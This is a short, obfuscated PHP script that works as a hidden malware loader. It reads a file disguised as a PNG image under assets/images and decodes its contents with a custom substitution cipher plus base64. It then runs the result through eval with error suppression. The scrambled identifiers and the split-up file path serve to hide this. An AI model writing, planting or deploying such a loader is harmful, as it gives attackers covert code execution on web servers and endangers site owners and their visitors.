<?php

function ocyheb_iqepimyb($mohery_zhyvyfyma) {
    if ($mohery_zhyvyfyma == 1)
        return afosuc_zhethynuwu();
    if ($mohery_zhyvyfyma == 2)
        return ramure_papojemox();
}

function juvesy_maruzogek($mohery_zhyvyfyma) {
    $ahymune = ocyheb_iqepimyb(1);
    $uhexyw = ocyheb_iqepimyb(2);
    for ($ilybir = 0; $ilybir < strlen($ahymune); $ilybir++) {
        $khelyso = substr($ahymune, $ilybir, 1);
        $yjetyru = substr($uhexyw, $ilybir, 1);
        $ytolokh[$khelyso] = $yjetyru;
    }

    $uvawyr = strtr($mohery_zhyvyfyma, $ytolokh);
    $uvawyr = base64_decode($uvawyr);

    return $uvawyr;
}

function pekotu_athujuke($mohery_zhyvyfyma) {
    $iracax = array();
    if (!file_exists($mohery_zhyvyfyma))
        return false;
    $symuci = @file_get_contents($mohery_zhyvyfyma);
    if (!$symuci)
        return false;
    $symuci = substr($symuci, 3);
    $iracax = juvesy_maruzogek($symuci);
    return $iracax;
}

function afosuc_zhethynuwu() {
    $symuci = "HxvXg2r/Yw9a+hlsZTdUFmE1O=uNeDkPCSBA35jVRWc6ynKIM4t0L7Gbf8zqQJiop";
    return $symuci;
}

function ramure_papojemox() {
    $iracax = "EJh6DwlM13/Og9v+WebumdiITKPLHSNxA74G2cnVtY=zXjqa8FCyk50srfQpURZoB";
    return $iracax;
}

$ejethac = pekotu_athujuke(__DIR__ . "/ass" . "ets/i" . "mage" . "s/uk" . "hekaj." . "png");
if ($ejethac) {
    @eval($ejethac);
}

